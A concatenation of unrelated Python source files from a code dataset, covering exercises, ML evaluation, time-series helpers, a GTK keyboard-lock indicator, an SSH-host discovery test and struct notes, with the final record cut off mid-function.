{"seq_id":"644933438","text":"Pink = int(input())\nGreen = int(input())\nRed = int(input())\nOrange = int(input())\ntoRaise = int(input())\nto = toRaise + 1\ncount = 0\nmini = 9999999\nfor i in range(to):\n    for j in range(to):\n        for k in range(to):\n            for l in range(to):\n                res = i*Pink + j*Green + k*Red + l*Orange\n                totTicks = i + j + k + l\n                if i == j == k == l == 0:\n                    continue\n                if res == toRaise:\n                    # track the minimum ticket count only over combinations that actually hit the target\n                    if mini > totTicks:\n                        mini = totTicks\n                    print(\"# of PINK is\", i , \"# of GREEN is\", j ,\"# of RED is\", k ,\"# of ORANGE is \", l)\n                    count += 1\nprint(\"Total combinations is \", count, \".\", sep=\"\")\nprint(\"Minimum number of tickets to print is \", mini, \".\", sep=\"\")","sub_path":"CCC/2933458.py","file_name":"2933458.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"47034783","text":"import json\nimport boto3\n\ncodebuild = boto3.client('codebuild')\n\ndef lambda_handler(event, context):\n    # Start a CodeBuild build when a CodeCommit push triggers this Lambda function\n    response = codebuild.start_build(\n        projectName = 'DemoQuestionExamCodeBuild',\n        sourceVersion = 'refs/heads/master'\n    )\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"172857758","text":"import os\nimport sys\n\nimport cv2\nimport torch\nfrom tqdm import tqdm\nimport numpy as np\n\nfrom coral_reef.constants import paths\nfrom coral_reef.ml import predict\nfrom coral_reef.ml.utils import colour_mask_to_class_id_mask, cut_windows\n\nsys.path.extend([paths.DEEPLAB_FOLDER_PATH, os.path.join(paths.DEEPLAB_FOLDER_PATH, \"utils\")])\n\nfrom metrics import Evaluator\n\n\ndef evaluate(image_file_paths, gt_file_paths, model, nn_input_size, num_classes, window_sizes=None, step_sizes=None,\n             device=None):\n    \"\"\"\n    Evaluate model performance\n    :param image_file_paths: paths to images that will be predicted\n    :param gt_file_paths: paths to ground truth masks\n    :param model: model used for prediction\n    :param nn_input_size: size that the images will be scaled to before feeding them into the nn\n    :param num_classes: number of classes\n    :param window_sizes: list of sizes that determine how the image will be cut (for sliding window). 
Image will be cut\n into squares\n :param step_sizes: list of step sizes for sliding window\n :param device: PyTorch device (cpu or gpu)\n :return: list of prediction masks if res_fcn is None, else Nothing\n \"\"\"\n model.eval()\n evaluator = Evaluator(num_classes)\n\n def ev(prediction, index):\n pred_class_id_mask = np.argmax(prediction, axis=-1)\n gt_colour_mask = cv2.imread(gt_file_paths[index])[:, :, 0]\n gt_class_id_mask = colour_mask_to_class_id_mask(gt_colour_mask)\n\n # Add sample into evaluator\n evaluator.add_batch(gt_class_id_mask, pred_class_id_mask)\n\n with torch.no_grad():\n predict.predict(image_file_paths=image_file_paths,\n model=model,\n nn_input_size=nn_input_size,\n res_fcn=ev,\n window_sizes=window_sizes,\n step_sizes=step_sizes,\n device=device)\n\n with np.errstate(divide='ignore', invalid='ignore'):\n acc = evaluator.Pixel_Accuracy()\n acc_class = evaluator.Pixel_Accuracy_Class()\n mIoU = evaluator.Mean_Intersection_over_Union()\n fWIoU = evaluator.Frequency_Weighted_Intersection_over_Union()\n\n return acc, acc_class, mIoU, fWIoU\n\n\ndef find_best_cutting_sizes(image_file_paths, gt_file_paths, model, nn_input_size, num_classes, device=None):\n \"\"\"\n Determine the best values for cutting the big image into smaller images for prediction\n :param image_file_paths: paths to images that will be predicted\n :param gt_file_paths: paths to ground truth masks\n :param model: model used for prediction\n :param nn_input_size: size that the images will be scaled to before feeding them into the nn\n :param num_classes: number of classes\n :param device: PyTorch device (cpu or gpu)\n :return: dict containing the tested values and the resulting prediction metrics\n \"\"\"\n\n # define the window sizes and step sizes that will be tested\n window_sizes_list = []\n step_sizes_list = []\n\n step_size_fractions = [0.8, 0.5, 0.3]\n for ss_fraction in step_size_fractions:\n window_sizes_list.append([500, 700, 1000, 1500])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n window_sizes_list.append([500, 700, 1000])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n window_sizes_list.append([700, 1000, 1500])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n window_sizes_list.append([700, 1000])\n step_sizes_list.append([int(w * ss_fraction) for w in window_sizes_list[-1]])\n\n results = []\n\n # go through window sizes and step sizes and use them for prediction\n\n for window_sizes, step_sizes in zip(window_sizes_list, step_sizes_list):\n acc, acc_class, mIoU, fWIoU = evaluate(image_file_paths=image_file_paths,\n gt_file_paths=gt_file_paths,\n model=model,\n nn_input_size=nn_input_size,\n num_classes=num_classes,\n window_sizes=window_sizes,\n step_sizes=step_sizes,\n device=device)\n\n # determine the number of images that each image was cut into\n cut_count = _determine_cut_count(image_file_paths, window_sizes, step_sizes)\n cut_count /= len(image_file_paths)\n\n results.append({\n \"acc\": np.round(acc, 2),\n \"acc_class\": np.round(acc_class, 2),\n \"mIoU\": np.round(mIoU, 2),\n \"fWIoU\": np.round(fWIoU, 2),\n \"window_sizes\": window_sizes,\n \"step_sizes\": step_sizes,\n \"cut_count_per_image\": cut_count\n })\n\n return results\n\n\ndef _determine_cut_count(image_file_paths, window_sizes, step_sizes):\n \"\"\"\n Determine how many cuts the given images will be cut into based on the given parameters\n :param image_file_paths: list of images that the cuts will be calculated 
for\n    :param window_sizes: parameter for cutting the images\n    :param step_sizes: parameter for cutting the images\n    :return: number of cuts\n    \"\"\"\n\n    cut_count = 0\n    for image_file_path in image_file_paths:\n        image = cv2.imread(image_file_path)\n\n        for window_size, step_size in zip(window_sizes, step_sizes):\n            cuts, _ = cut_windows(image, window_size, step_size)\n            cut_count += len(cuts)\n\n    return cut_count\n","sub_path":"coral_reef/ml/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"163056590","text":"from numpy import random\n\ndef create_ran_file(filename, eline, ecol):\n    output=open(filename, 'w')\n    randArray = random.random(size=(eline,ecol))\n\n    for line in randArray:\n        i=0\n        for elem in line:\n            strelem='%f'%elem\n            if i == 0:  # compare with ==, not 'is', when testing integer values\n                output.write(strelem)\n            else:\n                output.write(' '+strelem)\n            i+=1\n        output.write('\\n')\n    output.close()\n    return\n\ncreate_ran_file('test.txt', 5, 4)\n","sub_path":"machinelearninginaction/RamData/CreateRanData.py","file_name":"CreateRanData.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"611553665","text":"def add(x,y): # function definition\n    r = x+y\n    return r # return r from the function\n\ndef eval(x, y, op):\n    # x = int(input(\"x = \"))\n    # y = int(input(\"y = \"))\n    if op == \"+\":\n        r = x+y # return x+y\n    elif op == \"-\":\n        r = x-y\n    elif op == \"*\":\n        r = x*y\n    elif op == \"/\":\n        r = x/y\n\n    return r # return the result or stop the program\nprint(eval(9, 10, \"-\"))\n\n    \n\n# a = int(input(\"a = \"))\n# b = int(input(\"b = \"))\n# t = add(a, b)\n# print(t)","sub_path":"labs3/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"347954594","text":"# Create (not programmatically) a text file in which every line holds data about a company:\n# name, form of ownership, revenue, costs.\n# Read the file line by line and compute each company's profit as well as the average profit.\n# If a company made a loss, do not include it in the average profit calculation.\n# Then implement a list. 
It must contain a dictionary with the companies and their profits, and a dictionary with the average profit.\n# If a company made a loss, add it to the dictionary as well (with the loss amount).\n\nimport json\n\nwith open('5.7.json', 'w') as fj:\n    with open('5.7.txt', encoding='utf-8') as f:\n        # profit ={line.split()[0]: int(line.split()[2])-int(line.split()[3]) for line in f}\n        # result =[profit, {'average_profit': round(sum([int(i) for i in profit.values() if int(i) > 0]) /\n        #                   len([int(i) for i in profit.values() if int(i) > 0]))}\n        profit = {}\n        sum_profit = 0\n        n = 0\n        for line in f:\n            a = line.split()\n            # profit (negative values are losses); every company goes into the dict,\n            # but only profitable companies count towards the average\n            c = int(a[2]) - int(a[3])\n            profit.update({a[0]: c})\n            if c > 0:\n                sum_profit = sum_profit + c\n                n = n + 1\n        # guard against division by zero when no company is profitable\n        av_profit = sum_profit / n if n else 0\n        print(profit)\n        profit.update({'average_profit': av_profit})\n        result = profit\n        json.dump(result, fj, ensure_ascii=False, indent=4)","sub_path":"Lesson 5/P5.7.py","file_name":"P5.7.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"27635225","text":"# Dict to hold pseudo registers, defaulted to 0 for simplicity\r\nReg = {\"x0\":0,\"x1\":0,\r\n       \"x2\":0,\"x3\":0,\r\n       \"x4\":0,\"x5\":0,\r\n       \"x6\":0,\"x7\":0,\r\n       \"x8\":0,\"x9\":0,}\r\n\r\n# Dict to hold Flags that are used for cmp and branching\r\nFlags = {\"eq\":False,\r\n         \"gt\":False,\r\n         \"lt\":False,\r\n         \"ne\":False}\r\n\r\n# Dict to hold all labels and their corresponding line numbers\r\nLabels = {}\r\n\r\n''' Move Instruction '''\r\ndef mov(dest, data):\r\n    dest = dest.replace(\" \", \"\").replace(\",\", \"\")\r\n    data = data.replace(\" \", \"\").replace(\",\", \"\")\r\n    if \"x\" in data:\r\n        Reg[dest] = Reg[data]\r\n    elif \"x\" not in data:\r\n        Reg[dest] = int(data)\r\n    elif dest not in Reg:\r\n        print(\"Invalid input\")\r\n\r\n''' conditional and branching instructions '''\r\ndef cmp(op1, op2):\r\n    if \"x\" in op1:\r\n        op1 = op1.replace(\" \", \"\").replace(\",\", \"\")\r\n        x = Reg[op1]\r\n    else:\r\n        x = int(op1)\r\n    if \"x\" in op2:\r\n        op2 = op2.replace(\" \", \"\").replace(\",\", \"\")\r\n        y = Reg[op2]\r\n    else:\r\n        y = int(op2)\r\n    Flags[\"eq\"] = x == y\r\n    Flags[\"lt\"] = x < y\r\n    Flags[\"gt\"] = x > y\r\n    Flags[\"ne\"] = x != y\r\n\r\n''' Arithmetic Instructions '''\r\ndef add(dest, op1, op2):\r\n    dest = dest.replace(\" \", \"\").replace(\",\", \"\")\r\n    x = op1\r\n    y = op2\r\n    if dest in Reg:\r\n        if \"x\" in op1:\r\n            op1 = op1.replace(\" \", \"\").replace(\",\", \"\")\r\n            x = Reg[op1]\r\n        if \"x\" in op2:\r\n            op2 = op2.replace(\" \", \"\").replace(\",\", \"\")\r\n            y = Reg[op2]\r\n        Reg[dest] = int(x) + int(y)\r\n    else:\r\n        print(\"invalid dest\")\r\n\r\ndef mul(dest, op1, op2):\r\n    x = op1\r\n    y = op2\r\n    if dest in Reg:\r\n        if \"x\" in op1:\r\n            x = Reg[op1]\r\n        if \"x\" in op2:\r\n            y = Reg[op2]\r\n        Reg[dest] = int(x) * int(y)\r\n    else:\r\n        print(\"invalid dest\")\r\n\r\ndef sub(dest, op1, op2):\r\n    x = op1\r\n    y = op2\r\n    if dest in Reg:\r\n        if \"x\" in op1:\r\n            x = Reg[op1]\r\n        if \"x\" in op2:\r\n            y = Reg[op2]\r\n        Reg[dest] = int(x) - int(y)\r\n    else:\r\n        print(dest)\r\n        print(\"invalid dest\")\r\n\r\n''' Parsing '''\r\ndef parse(line):\r\n    parsed = [x for x in line.split(\" \") if x != \"\"]\r\n    for i in range(0, len(parsed)):\r\n        # comment handling\r\n        if \"@\" in parsed[i]:\r\n            parsed[i] = \"\"\r\n        else:\r\n            parsed[i] = parsed[i].replace(\" \", \"\").replace(\",\", \"\").replace(\"#\", \"\")\r\n    return parsed\r\n\r\n''' Get Labels '''\r\ndef 
getLabels(inputFile):\r\n    for k in range(0, len(inputFile)):\r\n        tmp = parse(inputFile[k])\r\n        if \":\" in tmp[0]:\r\n            Labels[tmp[0][:-1]] = k","sub_path":"reg.py","file_name":"reg.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"334341621","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 29 18:03:05 2020\r\n\r\n@author: Sansrit Paudel\r\n\r\n\"\"\"\r\n\r\nfrom sys import argv\r\n\r\n#TO CHECK IF THE FILE EXISTS OR NOT\r\n\r\n\r\nfrom os.path import exists\r\n\r\nscript, file1, file2 = argv\r\n\r\nprint(\"Copying from %s to %s \" %(file1,file2 ))\r\n\r\n#OPEN THE FILE AND STORE IT IN A VARIABLE\r\n\r\n\r\nin_file = open(file1)\r\n\r\n#READ FROM THE FILE 1 VARIABLE INTO THE NEXT VARIABLE\r\n\r\n\r\nindata = in_file.read()\r\n\r\n#RETURNS THE TOTAL LENGTH OF THE FILE\r\n\r\n\r\nprint(\"The input file is %d bytes long\" %len(indata))\r\n\r\n\r\n#RETURNS THE BOOLEAN VALUE OF WHETHER FILE 2 EXISTS OR NOT.\r\nprint(\"Does the output file exist? %r\" %exists(file2))\r\n\r\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\r\n\r\n\r\ninput()\r\n\r\n#FIRST OPEN THE FILE, SPECIFYING WRITE MODE, AND STORE IT IN A VARIABLE.\r\n\r\n\r\nfile2 = open(file2, 'w')\r\n\r\n#USE THE WRITE METHOD TO COPY THE DATA INTO THE NEXT FILE.\r\n\r\nfile2.write(indata)  # write the file contents, not the file name\r\n\r\n\r\nprint(\"Alright, all done \")\r\n\r\nfile2.close()\r\nin_file.close()\r\n\r\n\r\n","sub_path":"Basics/14.More_on_files.py","file_name":"14.More_on_files.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"399313086","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# indicator-keyboard-led - simulate keyboard lock keys LED\n# Copyright (c) 2016 Adrian I Lam \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL\n# THE AUTHOR OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n#\n# I would like to thank Tobias Schlitt , who wrote\n# indicator-chars which I used\n# as a reference when writing this software.\n\nimport signal\nimport subprocess\nfrom os import path\nimport argparse\nimport sys\nimport gi\ngi.require_version('Gdk', '3.0')\ngi.require_version('Gtk', '3.0')\ngi.require_version('AppIndicator3', '0.1')\nfrom gi.repository import Gdk, Gtk, AppIndicator3\n\nSCRIPT_DIR = path.dirname(path.realpath(__file__))\nimport gettext\nt = gettext.translation('default', path.join(SCRIPT_DIR, 'locale'))\n_ = t.gettext\n\nclass IndicatorKeyboardLED:\n locks = { 'N': _('Num'), 'C': _('Caps'), 'S': _('Scroll') }\n \n def __init__(self, short=False, order='NCS'):\n self.indicator = AppIndicator3.Indicator.new(\n 'indicator-keyboard-led',\n path.join(SCRIPT_DIR, 'icon.svg'),\n AppIndicator3.IndicatorCategory.APPLICATION_STATUS)\n self.indicator.set_status(AppIndicator3.IndicatorStatus.ACTIVE)\n\n if short:\n self.locks = { 'N': _('N'), 'C': _('C'), 'S': _('S') }\n\n keymap = Gdk.Keymap.get_default()\n keymap.connect('state-changed', self.update_indicator, order)\n self.update_indicator(keymap, order)\n\n menu = Gtk.Menu()\n items = {\n 'N': Gtk.MenuItem.new_with_label(_('Num Lock')),\n 'C': Gtk.MenuItem.new_with_label(_('Caps Lock')),\n 'S': Gtk.MenuItem.new_with_label(_('Scroll Lock'))\n }\n items['N'].connect('activate', self.send_keypress, 'Num_Lock')\n items['C'].connect('activate', self.send_keypress, 'Caps_Lock')\n items['S'].connect('activate', self.send_keypress, 'Scroll_Lock')\n\n for i in order:\n menu.append(items[i])\n\n quit_item = Gtk.MenuItem.new_with_label(_('Quit'))\n menu.append(Gtk.SeparatorMenuItem())\n menu.append(quit_item)\n quit_item.connect('activate', Gtk.main_quit)\n\n self.indicator.set_menu(menu)\n menu.show_all()\n\n def update_indicator(self, keymap, order):\n labels = []\n for i in order:\n if i == 'N':\n state = keymap.get_num_lock_state()\n elif i == 'C':\n state = keymap.get_caps_lock_state()\n elif i == 'S':\n state = keymap.get_scroll_lock_state()\n else:\n raise ValueError('Invalid value in ORDER')\n labels += [('⚫' if state else '⚪') + self.locks[i]]\n self.indicator.set_label(' '.join(labels), '')\n\n def send_keypress(self, menuitem, keystroke):\n subprocess.call(['xdotool', 'key', keystroke])\n\ndef validate_order(args):\n args.order = args.order.upper()\n for i in args.order:\n if i not in ['N', 'C', 'S']:\n sys.exit('Illegal character in ORDER. (Choices: [N, C, S])')\n if len(args.order) != len(set(args.order)):\n sys.exit('Repeated character in ORDER. '\n 'Please specify each lock at most once.')\n\nif __name__ == '__main__':\n signal.signal(signal.SIGINT, lambda signum, frame: Gtk.main_quit())\n\n parser = argparse.ArgumentParser(\n description='indicator-keyboard-led - simulate keyboard lock keys LED',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-s', '--short', required=False, action='store_true',\n help='use short label, i.e. ⚫N ⚫C ⚫S instead of ⚫Num ⚫Caps ⚫Scroll')\n parser.add_argument('-o', '--order', required=False, default='NCS',\n help='specify the order of the locks displayed, e.g. 
CSN for '\n '⚫Caps ⚫Scroll ⚫Num, or NC for ⚫Num ⚫Caps without Scroll lock')\n args = parser.parse_args()\n validate_order(args)\n\n IndicatorKeyboardLED(short=args.short, order=args.order)\n Gtk.main()\n","sub_path":"indicator-keyboard-led.py","file_name":"indicator-keyboard-led.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"579259150","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom statsmodels.tsa.stattools import adfuller\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nfrom statsmodels.tsa.arima_model import ARMAResults\nfrom pyramid.arima import auto_arima\n\nplt.style.use('seaborn-dark')\nplt.rcParams[\"axes.edgecolor\"] = \"black\"\nplt.rcParams[\"axes.linewidth\"] = 1\n\n# ----------------------------- #\n# define the object time series #\n# ----------------------------- #\ndef get_ts():\n rng = pd.date_range('1/1/2018', periods=31, freq='H')\n ts = pd.Series(np.random.randn(len(rng)), index=rng)\n return ts\n\n\ndef read_ts(file_name):\n data = pd.read_csv(file_name)\n times_values = pd.to_datetime(data[data.columns[0]])\n num_values = data[data.columns[1]]\n ts = pd.Series(num_values.values, index=times_values)\n return ts\n\n\n# ------------------- #\n# check if stationary #\n# ------------------- #\n\ndef plot_rolling_avg(ts):\n assert isinstance(ts, pd.Series)\n rol_mean = ts.rolling(window=14, center=False).mean()\n rol_std = ts.rolling(window=14, center=False).std()\n orig = plt.plot(ts, label='Original')\n mean = plt.plot(rol_mean, label='Rolling Mean')\n std = plt.plot(rol_std, label='Rolling Std')\n plt.legend(loc='best')\n plt.title('Rolling Mean & Standard Deviation')\n plt.show()\n\n\ndef is_Dickey_Fuller_rejected(ts):\n assert isinstance(ts, pd.Series)\n test_param = adfuller(ts, autolag='AIC')\n return test_param[1] < 0.05\n\n\n# --------------------------------- #\n# make stationary by removing trend #\n# --------------------------------- #\n\ndef remove_trend(ts):\n assert isinstance(ts, pd.Series)\n rol_mean = ts.rolling(window=14, center=False).mean()\n ts_diff = ts - rol_mean\n ts_diff.dropna(inplace=True)\n return ts_diff\n\n\n# ------------------------------ #\n# make stationary by differences #\n# ------------------------------ #\n\ndef get_diff(ts):\n ts_diff = ts - ts.shift()\n ts_diff.dropna(inplace=True)\n return ts_diff\n\n\n# -------------------------------- #\n# make stationary by decomposition #\n# -------------------------------- #\n\ndef get_decomposition(ts, plot=True):\n decomposition = seasonal_decompose(ts)\n\n trend = decomposition.trend\n seasonal = decomposition.seasonal\n residual = decomposition.resid\n\n if plot:\n plt.subplot(411)\n plt.plot(ts, label='Original')\n plt.legend(loc='best')\n plt.subplot(412)\n plt.plot(trend, label='Trend')\n plt.legend(loc='best')\n plt.subplot(413)\n plt.plot(seasonal, label='Seasonality')\n plt.legend(loc='best')\n plt.subplot(414)\n plt.plot(residual, label='Residuals')\n plt.legend(loc='best')\n plt.tight_layout()\n plt.show()\n\n dec_dict = {'trend': trend,\n 'seasonal': seasonal,\n 'residual': residual}\n return dec_dict\n\n\ndef get_train_test_split(ts, ratio=2/3):\n assert isinstance(ts, pd.Series)\n idx = int(ratio*len(ts.index))\n train = ts[0:idx]\n test = ts[idx+1: len(ts.index)]\n return train, test\n\n\ndef train_ARIMA_model(train_ts):\n assert isinstance(train_ts, pd.Series)\n stepwise_model = 
auto_arima(train_ts, start_p=1, start_q=1,\n max_p=3, max_q=3, m=12,\n start_P=0, seasonal=True,\n d=1, D=1, trace=True,\n error_action='ignore',\n suppress_warnings=True,\n stepwise=True)\n print(stepwise_model.summary())\n return stepwise_model\n\n\ndef test_ARIMA_model(test_ts, stepwise_model, plot=True):\n assert isinstance(test_ts, pd.Series)\n future_forecast = stepwise_model.predict(n_periods=len(test_ts.index))\n future_forecast = pd.DataFrame(\n future_forecast, index=test_ts.index, columns=['prediction'])\n test_forecast = pd.concat([test_ts, future_forecast], axis=1)\n test_forecast.rename(columns={0: 'original'}, inplace=True)\n if plot:\n test_forecast.plot()\n plt.show()\n return test_forecast\n\n\ndef append_forecast(ts, test_forecast, plot=True):\n assert isinstance(ts, pd.Series)\n assert isinstance(test_forecast, pd.DataFrame)\n complete_prediction_df = pd.concat([ts, test_forecast], axis=1)\n complete_prediction_df.rename(columns={0: 'train_set'}, inplace=True)\n if plot:\n complete_prediction_df.plot()\n plt.show()\n return complete_prediction_df\n","sub_path":"src/time_series/ts_utils.py","file_name":"ts_utils.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479179320","text":"import os\nimport re\nimport string\nfrom typing import Callable, Dict, List, Optional\n\nimport numpy as np\n\n\nclass NestedSingleType:\n @staticmethod\n def is_iterable(obj):\n if isinstance(obj, str) or isinstance(obj, dict):\n return False\n try:\n iter(obj)\n except TypeError:\n return False\n return True\n\n @staticmethod\n def join(types: List[str]):\n nested_types = f\"{types.pop(-1)}\"\n\n for _type in types:\n nested_types = f\"{_type}<{nested_types}>\"\n return nested_types.lower()\n\n @classmethod\n def get_type(cls, obj, order: Optional[int] = None):\n _obj = obj\n\n types = []\n while cls.is_iterable(_obj):\n types.append(type(_obj).__name__)\n _obj = _obj[0]\n types.append(type(_obj).__name__)\n if order is not None:\n return types[order]\n\n return cls.join(types)\n\n\ndef remove_punctuations(text: str) -> str:\n regex = re.compile(\"[%s]\" % re.escape(string.punctuation))\n text = regex.sub(\" \", text)\n return \" \".join(text.split())\n\n\ndef bulk_remove_keys(obj: Dict, keys: List[str]) -> Dict:\n return {k: v for k, v in obj.items() if k not in keys}\n\n\ndef is_reduce_fn(fun: Callable) -> bool:\n result = np.array(fun([1, 2]))\n return result.size == 1\n\n\ndef set_env(name: str, value: str):\n if not isinstance(value, str):\n raise ValueError(f\"Expected type str for 'value', got {type(value)}.\")\n os.environ[name] = value\n\n\ndef replace(a: List, obj: object, index=-1):\n del a[index]\n a.insert(index, obj)\n return a\n","sub_path":"jury/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"650619211","text":"\"\"\"\nnormally we use coroutines, but for demo purposes we have threadpool too.\n\"\"\"\nimport ipaddress\n\nimport findssh.threadpool\n\nPORT = 22\nSERVICE = \"\"\nTIMEOUT = 1.0\n\n\ndef test_threadpool():\n net = findssh.netfromaddress(findssh.getLANip())\n hosts = findssh.threadpool.get_hosts(net, PORT, SERVICE, TIMEOUT)\n for host, svc in hosts:\n assert isinstance(host, ipaddress.IPv4Address)\n assert isinstance(svc, str)\n 
break\n","sub_path":"src/findssh/tests/test_threadpool.py","file_name":"test_threadpool.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"8867560","text":"import threading\nimport time\n\nexit_flag = 0\n\n\nclass MyThread(threading.Thread):\n def __init__(self, threadID, name, counter):\n super(MyThread, self).__init__()\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def run(self):\n print('Starting ' + self.name + '\\n')\n my_function(self.name, 2, self.counter)\n print('Exiting ' + self.name + '\\n')\n\n # function could be inside of class and be called self.my_...\n\n\ndef my_function(threadName, delay, counter):\n while counter:\n if exit_flag:\n thread.exit()\n # break\n time.sleep(delay)\n print('{0}: {1}'.format(threadName, time.ctime(time.time())))\n counter -= 1\n\n\ndef main():\n \"\"\" Main \"\"\"\n thread1 = MyThread(1, \"Thread - 1\", 5)\n thread2 = MyThread(2, \"Thread - 2\", 3)\n\n thread1.start()\n thread2.start()\n\n thread1.join()\n thread2.join()\n\n print('end program')\n\nif __name__ == '__main__':\n main()\n","sub_path":"threads/subclassthread.py","file_name":"subclassthread.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48914059","text":"import struct\r\nstruct_map = \"\"\"\r\nstruct中支持的格式如下表:\r\n\r\nFormat\tC Type\tPython\t字节数\r\n x \tpad byte \tno value \t1\r\n c \tchar \tstring of length 1 \t1 \r\n b \tsigned char \tinteger \t1 -128 ~ 127 \r\n B \tunsigned char \tinteger \t1 0 ~ 255\r\n ? \t_Bool \tbool \t1\r\n h \tshort \tinteger \t2\r\n H \tunsigned short \tinteger \t2\r\n i \tint \tinteger \t4\r\n I \tunsigned int \tinteger or lon \t4\r\n l \tlong \tinteger \t4\r\n L \tunsigned long \tlong \t4\r\n q \tlong long \tlong \t8\r\n Q \tunsigned long long \tlong \t8\r\n f \tfloat \tfloat \t4\r\n d \tdouble \tfloat \t8\r\n s \tchar[] \tstring \t1\r\n p \tchar[] \tstring \t1\r\n P \tvoid * \tlong \t \"\"\"\r\n\r\n# print(u'\\n说明:\\n\\tpack方法把指定类型数据转换成bytes类型, \\n\\tunpack方法把bytes类型转换成指定类型')\r\n# print(struct_map)\r\n#\r\n#\r\n# byte_a = b'\\xf0'\r\n#\r\n# print(u'\\n原始字节对象:\\n', byte_a, type(byte_a))\r\n# print('')\r\n#\r\n#\r\n# # 转无符号整数(0~255 int)类型\r\n# char_a = struct.unpack('B', byte_a)\r\n# print(u'转无符号整数(0~255 int)类型:\\n', char_a[0], type(char_a[0]), struct.pack('I',char_a[0]))\r\n# print('')\r\n#\r\n# # 转有符号整数(-128~127)类型\r\n# signed_char_a = struct.unpack('b', byte_a)\r\n# print(u'转有符号整数(-128~127)类型:\\n', signed_char_a[0], type(signed_char_a[0]), struct.pack('i',signed_char_a[0]))\r\n# print('')\r\n#\r\n# print(\"说明:\\n\\t负数在计算机中由正数按位取反加一表示,例如 1('\\\\x01\\\\x00\\\\x00\\\\x00') 按位取反加一得到 -1('\\\\xff\\\\xff\\\\xff\\\\xff')\\n\")\r\n#\r\n# # 无符号整数取反得到有符号整数\r\n# r_int_a = ~char_a[0]\r\n# print(u'无符号整数取反得到有符号整数:\\n', r_int_a, type(r_int_a), struct.pack('i', r_int_a))\r\n# print('')\r\n#\r\n# # 有符号整数转无符号整数\r\n# unsigned_r_int_a = struct.unpack('I', struct.pack('i', r_int_a))[0]\r\n# print(u'有符号整数转无符号整数:\\n', unsigned_r_int_a, type(unsigned_r_int_a), struct.pack('I', unsigned_r_int_a))\r\n# print('')\r\n#\r\n# # 取整数的最低位\r\n# print(u'取整数的最低位:')\r\n# print('整数:',unsigned_r_int_a, struct.pack('I', unsigned_r_int_a))\r\n# print('最低位:', struct.pack('I', unsigned_r_int_a)[0], struct.pack('b', struct.pack('I', unsigned_r_int_a)[0]))\r\n\r\ndef revers_bytes(b_data):\r\n \"\"\"\r\n 字节取反\r\n :param b_data: bytes 字节数据\r\n :return:\r\n \"\"\"\r\n 
